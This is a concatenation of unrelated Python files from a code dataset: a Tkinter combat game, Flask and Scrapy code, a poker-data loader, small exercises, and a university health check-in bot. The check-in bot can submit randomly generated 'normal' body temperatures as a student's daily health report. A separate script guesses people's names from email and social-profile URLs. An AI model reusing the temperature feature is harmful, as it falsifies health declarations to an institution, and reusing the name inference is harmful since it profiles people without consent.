column=3,columnspan=3,rowspan=4)\n\n\tataque1=miGuerrero.lista_ataques[0]\n\tataque2=miGuerrero.lista_ataques[1]\n\tataque3=miGuerrero.lista_ataques[2]\n\tataque4=miGuerrero.lista_ataques[3]\n\n\t\n\n\tlaPantalla=Label(frame_display,textvariable=texto_pantalla)\n\tlaPantalla.grid(row=0,column=0,padx=2,columnspan=3)\n\n\tboton_avanzar=Button(frame_display,text=\"Avanzar\",command=lambda:avanzar_consola())\n\tboton_avanzar.grid(row=2,column=2,sticky=\"e\",pady=2,padx=2)\n\n\tboton_ataque1=Button(frame_display,text=\"{}\".format(ataque1[0]),width=15,command=lambda:ataque(ataque1))\n\tboton_ataque1.grid(row=3,column=0,padx=2)\n\n\tboton_ataque1etiqueta=Label(frame_display,text=\"{}\".format(ataque1[1]))\n\tboton_ataque1etiqueta.grid(row=3,padx=2,column=1)\n\n\tboton_ataque1valores=Label(frame_display,text=\"{} | {}\".format(ataque1[2],ataque1[3]))\n\tboton_ataque1valores.grid(row=3,padx=2,column=2)\n\n\tboton_ataque2=Button(frame_display,text=\"{}\".format(ataque2[0]),width=15,command=lambda:ataque(ataque2))\n\tboton_ataque2.grid(row=4,column=0,padx=2)\n\n\tboton_ataque2etiqueta=Label(frame_display,text=\"{}\".format(ataque2[1]))\n\tboton_ataque2etiqueta.grid(row=4,padx=2,column=1)\n\n\tboton_ataque2valores=Label(frame_display,text=\"{} | {}\".format(ataque2[2],ataque2[3]))\n\tboton_ataque2valores.grid(row=4,padx=2,column=2)\n\n\tboton_ataque3=Button(frame_display,text=\"{}\".format(ataque3[0]),width=15,command=lambda:ataque(ataque3))\n\tboton_ataque3.grid(row=5,column=0,padx=2)\n\n\tboton_ataque3etiqueta=Label(frame_display,text=\"{}\".format(ataque3[1]))\n\tboton_ataque3etiqueta.grid(row=5,padx=2,column=1)\n\n\tboton_ataque3valores=Label(frame_display,text=\"{} | {}\".format(ataque3[2],ataque3[3]))\n\tboton_ataque3valores.grid(row=5,padx=2,column=2)\n\n\tboton_ataque4=Button(frame_display,text=\"{}\".format(ataque4[0]),width=15,command=lambda:ataque(ataque4))\n\tboton_ataque4.grid(row=6,column=0,padx=2)\n\n\tboton_ataque4etiqueta=Label(frame_display,text=\"{}\".format(ataque4[1]))\n\tboton_ataque4etiqueta.grid(row=6,padx=2,column=1)\n\n\tboton_ataque4valores=Label(frame_display,text=\"{} | {}\".format(ataque4[2],ataque4[3]))\n\tboton_ataque4valores.grid(row=6,padx=2,column=2)\n\n\tobjetoslabel=Label(frame_display,text=\"Objetos:\")\n\tobjetoslabel.grid(row=7,column=0,pady=5,padx=2,sticky=\"e\")\n\n\tobjetosusar=Button(frame_display,text=\"Usar\",command=lambda:usar_objeto())\n\tobjetosusar.grid(row=7,column=2,pady=5,sticky=\"w\")\n\n\tobjetos=ttk.Combobox(frame_display,width=10,state=\"readonly\")\n\tobjetos.grid(row=7,column=1,pady=5)\n\tvalores=[]\n\tfor i in jugador.equipo_objetos:\n\t\tif i[4]==0:\n\t\t\tvalores.append(i[0])\n\n\t\tobjetos['values']=valores\n\n\tdef actualizarobjetos():\n\t\tobjetoslabel=Label(frame_display,text=\"Objetos:\")\n\t\tobjetoslabel.grid(row=7,column=0,pady=5,padx=2,sticky=\"e\")\n\n\t\tobjetosusar=Button(frame_display,text=\"Usar\",command=lambda:usar_objeto())\n\t\tobjetosusar.grid(row=7,column=2,pady=5,sticky=\"w\")\n\n\t\tlistadepociones=[]\n\t\tfor i in jugador.equipo_objetos:\n\t\t\tif i[4]==0:\n\t\t\t\tlistadepociones.append(i)\n\n\t\t\n\t\tif len(listadepociones)==0:\n\t\t\tobjetosusar.config(state=DISABLED)\n\t\telse:\n\t\t\tobjetosusar.config(state=NORMAL)\t\t\n\n\t\tobjetos=ttk.Combobox(frame_display,width=10,state=\"readonly\")\n\t\tobjetos.grid(row=7,column=1,pady=5)\n\t\tvalores=[]\n\t\tfor i in jugador.equipo_objetos:\n\t\t\tif i[4]==0:\n\t\t\t\tvalores.append(i[0])\n\n\t\tobjetos['values']=valores\t\n\t\t\n\t\n\n\tboton_descansar=Button(frame_display,text=\"Descansar\",width=20,command=lambda:descanso())\n\tboton_descansar.grid(row=8,column=1,padx=2,pady=2,columnspan=2)\n\n\tif comando_consola==0:\n\t\tcomando_consola+=1\n\t\ttexto_pantalla.set(\"Es tu turno, elige un ataque:\")\n\t\tboton_avanzar.config(state=DISABLED)\n\t\tif ataque1[3]>miGuerrero.mana_actual:\n\t\t\tboton_ataque1.config(state=DISABLED)\n\t\tif ataque2[3]>miGuerrero.mana_actual:\n\t\t\tboton_ataque2.config(state=DISABLED)\n\t\tif ataque3[3]>miGuerrero.mana_actual:\n\t\t\tboton_ataque3.config(state=DISABLED)\t\t\n\t\tif ataque4[3]>miGuerrero.mana_actual:\n\t\t\tboton_ataque4.config(state=DISABLED)\n\n\tdef test_finalizar_combate():\n\n\t\tif suGuerrero.vida_actual==0:\n\n\t\t\tif len(enemigo.equipo_guerreros)>0:\n\n\t\t\t\texp=suGuerrero.valor_exp\n\t\t\t\tpreguerrerito=enemigo.equipo_guerreros[0]\n\t\t\t\tpreguerrerito[0]=suGuerrero\n\t\t\t\tenemigo.equipo_guerreros[0]=preguerrerito\n\t\t\t\tenemigo.equipo_herido.append(enemigo.equipo_guerreros[0])\n\t\t\t\tenemigo.equipo_guerreros.pop(0)\n\t\t\t\tpreenemigo=enemigo.equipo_guerreros[0]\n\t\t\t\tguerrero1=preenemigo[0]\n\n\n\t\t\t\troot.destroy()\n\t\t\t\tcomando_consola=0\n\t\t\t\tframe_aumentar_exp(miGuerrero,exp)\n\t\t\t\n\t\t\t\n\n\n\tdef avanzar_consola():\n\t\ttest_finalizar_combate()\n\t\tglobal texto_pantalla\n\t\tglobal comando_consola\n\t\t\n\t\t\n\t\t\t\t#-------------------------------------\n\t\tif comando_consola!=3:\n\t\t\tcomando_consola+=1\n\t\telse:\n\t\t\tcomando_consola=1\t\n\n\t\tif comando_consola==1:\n\t\t\ttexto_pantalla.set(\"Es tu turno, elige un ataque:\")\n\n\t\t\tboton_ataque1.config(state=NORMAL)\n\t\t\tboton_ataque2.config(state=NORMAL)\n\t\t\tboton_ataque3.config(state=NORMAL)\n\t\t\tboton_ataque4.config(state=NORMAL)\n\t\t\tboton_descansar.config(state=NORMAL)\n\t\t\tboton_avanzar.config(state=DISABLED)\n\n\t\t\tif len(jugador.equipo_objetos)==0:\n\t\t\t\tobjetosusar.config(state=DISABLED)\t\n\n\t\t\tif ataque1[3]>miGuerrero.mana_actual:\n\t\t\t\tboton_ataque1.config(state=DISABLED)\n\t\t\tif ataque2[3]>miGuerrero.mana_actual:\n\t\t\t\tboton_ataque2.config(state=DISABLED)\n\t\t\tif ataque3[3]>miGuerrero.mana_actual:\n\t\t\t\tboton_ataque3.config(state=DISABLED)\t\t\n\t\t\tif ataque4[3]>miGuerrero.mana_actual:\n\t\t\t\tboton_ataque4.config(state=DISABLED)\n\t\t\t\t\n\n\t\telif comando_consola==2:\n\t\t\t\n\t\t\ttexto_pantalla.set(\"Es turno de {}\".format(suGuerrero.nombre))\n\n\t\t\tif len(jugador.equipo_objetos)!=0:\n\t\t\t\tobjetosusar.config(state=NORMAL)\n\t\t\t\tboton_ataque1.config(state=DISABLED)\n\t\t\t\tboton_ataque2.config(state=DISABLED)\n\t\t\t\tboton_ataque3.config(state=DISABLED)\n\t\t\t\tboton_ataque4.config(state=DISABLED)\n\t\t\t\tboton_descansar.config(state=DISABLED)\n\t\t\t\tboton_avanzar.config(state=NORMAL)\n\n\t\t\t\n\n\t\n\t\telif comando_consola==3:\n\t\t\t\n\t\t\tataque_aleatorio=random.choice(suGuerrero.lista_ataques)\n\t\t\tdanhoenemigo=suGuerrero.ataque+ataque_aleatorio[2]-miGuerrero.defensa*2\n\n\n\t\t\tif suGuerrero.mana_actual>ataque_aleatorio[3]:\n\t\t\t\tsuGuerrero.mana_actual-=ataque_aleatorio[3]\n\n\t\t\t\tif miGuerrero.vida_actual>=danhoenemigo:\n\n\t\t\t\t\tmiGuerrero.vida_actual-=danhoenemigo\n\t\t\t\telse:\n\t\t\t\t\t\n\t\t\t\t\tmiGuerrero.vida_actual=0\t\n\n\t\t\t\ttexto_pantalla.set(\"Ha utilizado {}\".format(ataque_aleatorio[0]))\n\t\t\telse:\n\t\t\t\tsuGuerrero.descansar()\n\t\t\t\ttexto_pantalla.set(\"Descansa para recuperarse\")\n\n\t\t\n\t\t\t\t#-------------------------------------\n\n\n\t\t\tactualizar_atributos()\n\n\t\t\n\t\t\n\n\tdef actualizar_atributos():\n\n\t\tinfoatributos2enemigo=Label(frame_infoenemigo,text=\"{}/{} hp \\n\\n{}/{} mp\".format(suGuerrero.vida_actual,suGuerrero.vida,suGuerrero.mana_actual,suGuerrero.mana))\n\t\tinfoatributos2enemigo.grid(row=4,column=1,rowspan=2,pady=2,padx=2,sticky=\"w\")\n\t\tinfoatributos2enemigo.config(font=(\"Arial\",11))\n\n\t\tinfoatributos2jugador=Label(frame_infojugador,text=\"{}/{} hp \\n\\n{}/{} mp\".format(miGuerrero.vida_actual,miGuerrero.vida,miGuerrero.mana_actual,miGuerrero.mana))\n\t\tinfoatributos2jugador.grid(row=4,column=1,rowspan=2,pady=2,padx=2,sticky=\"w\")\n\t\tinfoatributos2jugador.config(font=(\"Arial\",11))\t\n\n\t\tenemigoyvaloracion=enemigo.equipo_guerreros[0]\n\t\tenemigoyvaloracion[0]=suGuerrero\n\t\tenemigo.equipo_guerreros[0]=enemigoyvaloracion\t\n\n\t\tjugadoryvaloracion=jugador.equipo_guerreros[0]\n\t\tjugadoryvaloracion[0]=miGuerrero\n\t\tjugador.equipo_guerreros[0]=jugadoryvaloracion\t\t\t\t\n\n\n\n\tdef usar_objeto():\n\t\tactualizar_atributos()\n\t\tfor i in jugador.equipo_objetos:\n\t\t\tif i[0]==objetos.get():\n\t\t\t\tindice=jugador.equipo_objetos.index(i)\n\n\t\t\n\t\t\n\n\t\n\t\t\t\t\n\t\tjugador.usarobjeto(jugador.equipo_objetos[indice],miGuerrero)\t\t\n\t\tactualizar_atributos()\n\n\t\tavanzar_consola()\n\t\tactualizarobjetos()\n\n\tdef ataque(ataqueusado):\n\t\t\n\t\tdanhoataque=miGuerrero.ataque+ataqueusado[2]-round(suGuerrero.defensa*2)\n\n\n\t\tif danhoataque<=0:\n\t\t\tdanhoataque=1\n\t\telse:\n\t\t\tpass\t\n\n\t\tif danhoataque0:\n\t\t\t\tcombate(guerrero1,miGuerrero)\n\n\t\troot.mainloop()\t\t\n\n\t\n\n\ncombate(guerrero1,guerrero)\t\n\n\n\n\"\"\"info_enemigo=Label(frame_combate)\ninfo_enemigo.grid(row=0, column=1,columnspan=2)\ninfo_enemigo.config(bg=\"red\",width=300,height=500)\n\n\n\tinfo_nombreenemigo=Label(info_enemigo,text=\"{} Tipo: {}\".format(suGuerrero.nombre,suGuerrero.tipo))\n\tinfo_nombreenemigo.grid(row=0,column=0,columnspan=2)\n\tinfo_nombreenemigo=Label(info_enemigo,text=\"Rareza: {} Tipo: {}\".format(suGuerrero.nombre,suGuerrero.tipo))\n\tinfo_nombreenemigo.grid(row=1,column=0,columnspan=2,rowspan=2)\"\"\"\n\n\t#info_rarezaenemigo=Label(info_enemigo,text=\"Rareza: {} Nivel: {}\".format(suGuerrero.rareza,suGuerrero.nivel))\n\t#info_nombreenemigo.grid(row=1,column=0,rowspan=2,sticky=\"w\")\n\n\n\n\t\n\n\t\n\t\n\n\n\n\n","sub_path":"Videojuego1/Combate.py","file_name":"Combate.py","file_ext":"py","file_size_in_byte":19897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"521204025","text":"# encoding: utf-8\nfrom bs4 import BeautifulSoup\nimport requests\nimport time, configparser, os, random\nimport toolsPack\n\nlogger = toolsPack.logger\npushInfo = toolsPack.pushInfo\n\n# 初始化\ntry:\n with open('info.ini') as f:\n pass\nexcept FileNotFoundError:\n print(logger(1, '正在初始化'))\n cookie = toolsPack.cookiesHander()\n status = toolsPack.infoGen(cookie)\n if status:\n info = '初始化成功,请检查并完善 info.ini 文件,以便下次运行,详见 readme 文件'\n print(logger(1, info))\n else:\n info = '初始化失败'\n print(logger(-1, info))\n exit(0)\n\ndef check(cookie,data):\n response = requests.post('http://yun.ujs.edu.cn/xxhgl/yqsb/grmrsb',\\\n headers = toolsPack.headers, cookies=cookie, data=data)\n soup = BeautifulSoup(response.text, 'html.parser')\n try:\n msg = soup.find_all('h2')[1].string\n except IndexError:\n return {'err' : 1}\n return {'err' : 0, 'msg' : msg}\n\nwhile True:\n config = configparser.ConfigParser()\n config.optionxform = str\n config.read('conf.ini')\n\n # 打卡\n checkTime = int(config['global']['checkTime'])\n now = int(time.strftime('%H'))\n if now == checkTime:\n print(logger(1,'进入打卡流程'))\n while True:\n cookie = toolsPack.cookiesHander()\n loginStatus = toolsPack.getStatus(cookie)\n if loginStatus == -1:\n info = '服务器维护中,20分钟后重试'\n print(logger(-1,info))\n pushInfo(info, '')\n time.sleep(20*60)\n continue\n elif loginStatus == -2:\n info = 'cookie无��导致登陆失败,20分钟后重试'\n print(logger(-1, info))\n pushInfo(info, '')\n time.sleep(20*60)\n continue\n # 提交表单\n data = toolsPack.dataHander()\n # 体温接口\n if config['global']['temperatureSource'] == 'randomNomral':\n data['xwwd'] = round(random.uniform(36.3, 37.2),1)\n data['swwd'] = round(random.uniform(36.3, 37.2),1)\n elif config['global']['temperatureSource'] == 'manual':\n data['xwwd'] = config['tempData']['amTemp']\n data['swwd'] = config['tempData']['pmTemp']\n checkStatus = check(cookie, data)\n print(logger(2, 'POST DATA:' + str(data)))\n if checkStatus['err']:\n info = '收到服务器端不正确的回复,请检查,20分钟后重试'\n print(logger(-1, info))\n pushInfo(info, '')\n time.sleep(20*60)\n continue\n else:\n info = '打卡成功\\^o^/'\n print(logger(1, info + '返回消息: ' + checkStatus['msg']))\n pushInfo(info, '返回消息: ' + checkStatus['msg'])\n break\n time.sleep(60*60) # 好梦\n time.sleep(60*60)\n print(logger(1, '等待打卡'))\n ","sub_path":"checker-daemon.py","file_name":"checker-daemon.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"243185079","text":"#-------------------------------------------------------------------------------\n# Name: patron\n# Purpose: Controllers for the Patron Blueprint in the Catalog Pull Platform\n#\n# Author: Jeremy Nelson\n#\n# Created: 2014-02-12\n# Copyright: (c) Jeremy Nelson, Colorado College 2014\n# Licence: MIT\n#-------------------------------------------------------------------------------\n\nfrom flask import Blueprint, current_app, flash, g, session\nfrom flask import redirect, render_template, request, url_for\n\nfrom flask.ext.login import LoginManager, login_user, login_required\nfrom flask.ext.login import logout_user, current_user\nfrom flask.ext.mongokit import MongoKit\n\nfrom patron.forms import LoginForm, RegisterForm\nfrom patron.models import Patron\n\nlogin_manager = LoginManager()\npatron = Blueprint('patron', __name__, template_folder='templates')\n\n@login_manager.user_loader\ndef load_patron(patronid):\n return g.mongo_storage.Patron.get(patronid)\n\n@patron.route(\"/history\", methods=['GET', 'POST'])\n@login_required\ndef history():\n patron_ = g.mongo_storage.Patron.get(current_user.id)\n return render_template(\"history.html\", patron=patron_)\n\n@patron.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n patron_ = Patron.get(form)\n login_user(patron_)\n return redirect(request.args.get('next') or url_for('home'))\n return render_template(\"login.html\", form=form)\n\n@patron.route('/logout',\n methods=['GET', 'POST'])\ndef logout():\n logout_user()\n flash(\"Logged out\")\n return redirect(request.args.get('next') or url_for(\"home\"))\n\n@patron.route('/register',\n methods=['GET', 'POST'])\ndef register():\n form = RegisterForm()\n if request.method == 'POST':\n patron = g.mongo_storage.Patron()\n patron.givenName = request.form.get('givenName')\n patron.familyName = request.form.get('familyName')\n patron.email = request.form.get('email')\n patron.save()\n return redirect(request.args.get('next') or url_for(\"home\"))\n return render_template(\"register.html\", form=form)\n\n\n\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"360448502","text":"# walkable\ngeometry = 0\n\n# hero body and sensor\nhero = 1\n\n# instant death\ntrap = 2\n\n# zombies, bats, boss, etc\nenemy = 3\n\n# out of bounds sensors, instant kill. for falling off map\nboundary = 4\n\n# sword\nhero_sword = 5\n\n# stairs\nstairs = 6\n","sub_path":"castlebats/collisions.py","file_name":"collisions.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"622888371","text":"'''\n18. Faça um programa para uma loja de tintas. O programa deverá pedir o tamanho em\nmetros quadrados da área a ser pintada. Considere que a cobertura da tinta é de 1 litro\npara cada 3 metros quadrados e que a tinta é vendida em latas de 18 litros, que custam\nR$ 80,00. Informe ao usuário a quantidades de latas de tinta a serem compradas e o\npreço total.\n'''\nimport math\nprint(\"==============Loja do VOVO==============\")\nmetros = float(input(\"Digite a quantidade de metros quadrados a serem pintados: \"))\n\nlitros = metros/3\nvalor = 80\nlatas = math.ceil(litros/18)\n\ntotal = latas * valor\nprint(f'Vai precisar usar {latas} latas de 18 litros, vai cutar {total}')\n","sub_path":"Lista01/ex018.py","file_name":"ex018.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"55980529","text":"\n# 3.改写之前学生信息的程序:\n#   输入5个学生成绩\n#   1)按成绩从高至低打印学生信息\n# 2)按年龄从高至低打印学生信息\n# 3)按年龄从低至高打印学生信息\n#   4)按原来输入顺序打印学生信息(保持原列表不变)\ninfos = []\n\ndef input_student():\n while True:\n name = input(\"请输入学生姓名(直接回车结束)\")\n if len(name) == 0:\n break\n age = int(input('请输入年龄'))\n score = int(input('请输入成绩'))\n d = {'name':name, 'age':age, 'score':score}\n infos.append(d)\n return infos\n\n\n\ninput_student()\n#定义表格的各个列的宽度\nname_w = 15\nage_w = 10\nscore_w = 10\nhead1 = '+' + '-'*name_w + '+' + '-'*age_w + '+' + '-'*score_w + '+'\ndef print_all(fn):\n print()\n print(head1)\n head_text = '|' + '姓名'.center(name_w - 2) +\\\n '|' + '年龄'.center(age_w - 2)+ '|' + '成绩'.center(score_w - 2) + '|'\n print(head_text)\n return fn\n\n\n\n@ print_all\ndef print_a(i):\n fmt = '|%s|%s|%s|'\n name_text = i['name'].center(name_w)\n age_text = str(i['age']).center(age_w)\n score_text = str(i['score']).center(score_w)\n print(fmt % (name_text, age_text, score_text))\n\nfor i in infos:\n print_a(i)\nprint(head1)\n#输入学生分数线\n# print('按学生成绩从高至低打印')\n# def getscore():\n# return L['score']\n\n\n# s1 = sorted(infos, key=getscore,reverse=True)\n\n","sub_path":"aid1807a/练习题/python练习题/python基础习题/11/homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472519185","text":"PERMISSION_TYPES = [\n 'permit',\n 'un_permit',\n 'add_owner',\n 'add_manager',\n 'add_new_product',\n 'add_existing_product',\n 'remove_product',\n 'remove_amount_of_product',\n 'add_hidden_discount',\n 'add_regular_discount',\n 'edit_regular_discount',\n 'edit_hidden_discount',\n 'edit_product',\n 'close_shop',\n 'reopen_shop',\n 'add_condition',\n 'add_sale',\n 'edit_product_condition'\n]\n# 'add_discount',\n","sub_path":"mysite/mysite/Shared_Classes/Consts.py","file_name":"Consts.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"215212026","text":"import pandas as pd\nimport tensorflow as tf\n\nTRAIN_URL = 'http://archive.ics.uci.edu/ml/machine-learning-databases/poker/poker-hand-training-true.data'\nTEST_URL = 'http://archive.ics.uci.edu/ml/machine-learning-databases/poker/poker-hand-testing.data'\n\nCSV_COLUMN_NAMES = [\n 'card_1_suit',\n 'card_1_rank',\n 'card_2_suit',\n 'card_2_rank',\n 'card_3_suit',\n 'card_3_rank',\n 'card_4_suit',\n 'card_4_rank',\n 'card_5_suit',\n 'card_5_rank',\n 'poker_hand'\n]\n\nPOKER_HANDS = [\n 'Nothing',\n 'One pair',\n 'Two pairs',\n 'Three of a kind',\n 'Straight',\n 'Flush',\n 'Full house',\n 'Four of a kind',\n 'Straight flush',\n 'Royal flush'\n]\n\ndef maybe_download():\n \"\"\"Use keras to download the datasets if they aren't already downloaded\"\"\"\n train_path = tf.keras.utils.get_file(TRAIN_URL.split('/')[-1], TRAIN_URL)\n test_path = tf.keras.utils.get_file(TEST_URL.split('/')[-1], TEST_URL)\n\n return train_path, test_path\n\ndef load_data(y_name='poker_hand'):\n \"\"\"Returns the poker hand dataset as (train_x, train_y), (test_x, test_y)\"\"\"\n train_path, test_path = maybe_download()\n\n # Load training data as a pandas DataFrame.\n # x refers to features and y refers to labels.\n train = pd.read_csv(train_path, names=CSV_COLUMN_NAMES, header=0)\n train_x, train_y = train, train.pop(y_name)\n\n # Load test data as a pandas DataFrame.\n test = pd.read_csv(test_path, names=CSV_COLUMN_NAMES, header=0)\n test_x, test_y = test, test.pop(y_name)\n\n return (train_x, train_y), (test_x, test_y)\n\ndef train_input_fn(features, labels, batch_size):\n \"\"\"Input function for training the network\"\"\"\n # Convert the inputs into a TensorFlow DataSet.\n dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))\n\n # Shuffle, repeat, and batch the examples.\n dataset = dataset.shuffle(1000).repeat().batch(batch_size)\n\n return dataset\n\ndef eval_input_fn(features, labels, batch_size):\n \"\"\"An input function for evaluation or prediction\"\"\"\n features = dict(features)\n if labels is None:\n # We are predicting, so only use features.\n inputs = features\n else:\n # We are evaluating, so use both.\n inputs = (features, labels)\n\n\n # Convert the inputs into a TensorFlow Dataset.\n dataset = tf.data.Dataset.from_tensor_slices(inputs)\n\n # Batch the examples\n dataset = dataset.batch(batch_size)\n\n return dataset","sub_path":"poker_data.py","file_name":"poker_data.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"548777721","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy_redis.spiders import RedisSpider\nfrom douban_slave.items import SlaveItem\nimport re\nclass SlaveSpider(RedisSpider):\n name = 'slave'\n #allowed_domains = ['douban.com']\n #start_urls = ['http://douban.com/']\n redis_key = 'doubanspider:start_urls'\n\n\n def __init__(self, *args, **kwargs):\n # 作用类似与scrapy的allowed_domains(限定爬虫爬取的url范围)\n # Dynamically define the allowed domains list.\n domain = kwargs.pop('domain', '')\n self.allowed_domains = filter(None, domain.split(','))\n super(SlaveSpider, self).__init__(*args, **kwargs)\n\n def parse(self, response):\n item = SlaveItem()\n item['id'] = response.url.split('/')[-2]\n item['title'] = response.css('a.nbg::attr(title)').extract_first()\n info = response.css('#info').extract_first()\n authors = re.findall('[\\s]*作者.*?(.*?)
', info, re.S) # 提取作者\n if authors:\n author_list = re.findall('[\\s]*(.*?)[\\s]*', authors[0], re.S)\n if author_list:\n item['author'] = \"、\".join(author_list).replace('\\n','').replace(' ','')\n else:\n item['author'] = \"\"\n else:\n item['author'] = \"\"\n #if re.search('(.*?)
',info,re.S):\n # author = re.search('(.*?)
',info,re.S).group(1)\n # item['author'] = '、'.join(re.findall('(.*?)',author,re.S)).replace(' ','').replace('\\n','')\n item['press'] = ''.join(re.findall('(.*?)
',info,re.S)).replace(' ','')\n item['original'] = ''.join(re.findall('(.*?)
',info,re.S)).replace(' ','')\n if re.search('(.*?)
',info,re.S):\n translator = re.search('(.*?)
',info,re.S).group(1)\n item['translator'] = '、'.join(re.findall('(.*?)',translator,re.S)).replace(' ','').replace('\\n','')\n item['imprint'] = ''.join(re.findall('出版年.*?(.*?)
',info,re.S)).replace('年','-').replace('月','-').replace(' ','')\n item['pages'] = ''.join(re.findall('页数.*?(.*?)
',info,re.S)).replace(' ','')\n item['price'] = ''.join(re.findall('定价.*?(.*?)
',info,re.S)).replace(' ','')\n item['binding'] = ''.join(re.findall('装帧.*?(.*?)
',info,re.S)).replace(' ','')\n item['series'] = ''.join(re.findall('.*?(.*?)',info,re.S))\n item['isbn'] = ''.join(re.findall('ISBN.*?(.*?)
',info,re.S)).replace(' ','')\n item['score'] = response.css('.ll.rating_num::text').extract_first().replace(' ','')\n item['number'] = response.css('.rating_people span::text').extract_first()\n yield item\n\n","sub_path":"douban_slave/douban_slave/spiders/slave.py","file_name":"slave.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"553202693","text":"\"\"\"\n@author: nermin.bibic\n\"\"\"\n\nimport sys\nimport re\n\nimport pandas as pd\nimport numpy as np\n\ndef empty_to_nan(value):\n if value == '' or value is None:\n value = np.nan\n return value\n\ndef hasNumbers(text):\n return bool(re.search(r'\\d', text))\n\ndef representsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\ndef name_from_email(email):\n email = str(email)\n first_name = last_name = ''\n\n if '@' in email:\n email_name = email.split('@')[0]\n if email_name.count('.') == 1 and '_' not in email_name:\n first_name = email_name.split('.')[0]\n last_name = email_name.split('.')[1]\n elif email_name.count('.') == 2 and '_' not in email_name:\n first_name = email_name.split('.')[0]\n last_name = email_name.split('.')[2]\n elif email_name.count('_') == 1 and '.' not in email_name:\n first_name = email_name.split('_')[0]\n last_name = email_name.split('_')[1]\n elif email_name.count('_') == 2 and '.' not in email_name:\n first_name = email_name.split('_')[0]\n last_name = email_name.split('_')[2]\n if len(first_name) < 2 or len(last_name) < 2 or hasNumbers(first_name) or hasNumbers(last_name):\n first_name = ''\n last_name = ''\n\n first_name = first_name.title()\n last_name = last_name.title()\n return first_name, last_name\n\ndef name_from_facebook(facebook):\n facebook = str(facebook)\n\n if 'facebook.com/' in facebook:\n facebook_name = facebook.split('.com/')[1]\n if facebook_name.count('.') == 1:\n first_name = facebook_name.split('.')[0]\n last_name = facebook_name.split('.')[1]\n elif facebook_name.count('.') == 2 and representsInt(facebook_name.split('.')[2]):\n first_name = facebook_name.split('.')[0]\n last_name = facebook_name.split('.')[1]\n elif facebook_name.count('.') == 3 and representsInt(facebook_name.split('.')[3]) and len(facebook_name.split('.')[1])==1:\n first_name = facebook_name.split('.')[0]\n last_name = facebook_name.split('.')[2]\n if len(first_name) < 2 or len(last_name) < 2 or hasNumbers(first_name) or hasNumbers(last_name):\n first_name = ''\n last_name = ''\n \n first_name = first_name.title()\n last_name = last_name.title()\n return first_name, last_name\n\ndef name_from_linkedin(linkedin):\n linkedin = str(linkedin)\n first_name = last_name = ''\n\n if 'linkedin.com/in/' in linkedin:\n linkedin_name = linkedin.split('linkedin.com/in/')[1]\n if '/' in linkedin_name:\n linkedin_name = linkedin_name.split('/')[0]\n elif 'linkedin.com/pub/' in linkedin:\n linkedin_name = linkedin.split('linkedin.com/pub/')[1]\n if '/' in linkedin_name:\n linkedin_name = linkedin_name.split('/')[0]\n if 'linkedin_name' in locals():\n if linkedin_name.count('-') == 1:\n first_name = linkedin_name.split('-')[0]\n last_name = linkedin_name.split('-')[1]\n elif linkedin_name.count('-') == 2 and representsInt(linkedin_name.split('-')[2]):\n first_name = linkedin_name.split('-')[0]\n last_name = linkedin_name.split('-')[1]\n elif linkedin_name.count('-') == 2 and not representsInt(linkedin_name.split('-')[2]):\n first_name = linkedin_name.split('-')[0]\n last_name = linkedin_name.split('-')[2]\n if len(first_name) < 2 or len(last_name) < 2 or hasNumbers(first_name) or hasNumbers(last_name):\n first_name = ''\n last_name = ''\n\n first_name = first_name.title()\n last_name = last_name.title()\n return first_name, last_name\n\ndef find_names(inputFile):\n data = pd.read_csv(inputFile, low_memory=False, encoding='iso-8859-1')\n data = data.fillna('')\n\n for i, row in data.iterrows():\n first_name = str(row['person-name-first'])\n last_name = str(row['person-name-last'])\n\n if first_name == '':\n\n first_name, last_name = name_from_email(row['person-communication-email_addresses'])\n\n if first_name == last_name == '':\n first_name, last_name = name_from_facebook(row['person-communication-facebook-url'])\n\n if first_name == last_name == '':\n first_name, last_name = name_from_linkedin(row['person-communication-linkedin-url'])\n \n if first_name != '' and last_name != '':\n data.set_value(i, 'person-name-first', first_name)\n data.set_value(i, 'person-name-last', last_name)\n data.set_value(i, 'person-name-full', first_name + \" \" + last_name)\n\n data.to_csv(inputFile.split(\".csv\")[0] + \"_added_names.csv\", index=False)\n\nfind_names(sys.argv[1])\n\n\n\n","sub_path":"Projects/data_manipulation/extract_names.py","file_name":"extract_names.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"329025035","text":"from webalchemy import remotedocument\n\nclass menu:\n def __init__(self,rdoc,on_add=None):\n self.rdoc= rdoc\n self.element= rdoc.element('nav')\n\n vn= 'nav.'+self.element.varname\n self.stylesheet= self.rdoc.stylesheet()\n self.rule_nav= self.stylesheet.rule(vn)\n self.rule_navli= self.stylesheet.rule(vn+' li')\n self.rule_navlihover= self.stylesheet.rule(vn+' li:hover')\n self.on_add= on_add\n\n def add_item(self,*varargs):\n for text in varargs:\n i= self.rdoc.element('li',text)\n if self.on_add:\n self.on_add(i,text)\n 